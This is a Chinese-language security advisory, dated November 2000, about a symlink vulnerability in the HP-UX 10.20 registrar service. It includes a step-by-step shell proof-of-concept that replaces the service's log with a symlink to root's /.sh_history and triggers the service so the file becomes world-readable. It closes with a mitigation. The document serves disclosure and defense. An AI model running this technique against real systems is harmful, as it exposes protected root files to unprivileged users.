HP-UX registrar 服务符号链接漏洞
发布日期:2000-11-09
更新日期:2000-11-09
受影响系统:
HP-UX 10.20
描述:
HP-UX 10.20携带的registrar服务存在一个漏洞,允许本地用户读取文件系统中任意
文件,该服务监听TCP/1712口,使用日志文件/etc/opt/resmon/log/registrar.log
缺省安装后/etc/opt/resmon/log目录允许所有用户移动日志文件,通常到1712端口
的连接出现时,由root创建、写入日志文件。
恶意的本地用户可以移动已经存在的日志文件,创建一个名为registrar.log的符号
链接到任意的本来无权访问的文件,此后到1712端口的连接出现时,符号链接所指向
的文件权限被修改成0644(全局可读),日志数据追加在文件尾部。
这将带来极大的本地安全危害。
<* 来源:J.A. Gutierrez (
spd@gtc1.cps.unizar.es) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
$ uname -sr
HP-UX B.10.20
$ cd /etc/opt/resmon/log
$ mv registrar.log registrar.log.orig
$ ls -l /.sh_history
-rw------- 1 root sys 3316 Sep 20 15:22 /.sh_history
$ ln -s /.sh_history registrar.log
$ nc hpux.example.com 1712 < /etc/motd
$ ls -l /.sh_history
-rw-r--r-- 2 root sys 3605 Nov 8 09:45 /.sh_history
$ rm -f registrar.log
$ mv registrar.log.orig registrar.log
建议:
临时解决办法:
NSFOCUS建议您确保只有root可访问/etc/opt/resmon/log目录
厂商补丁:
暂无
浏览次数:6258
严重程度:0(网友投票)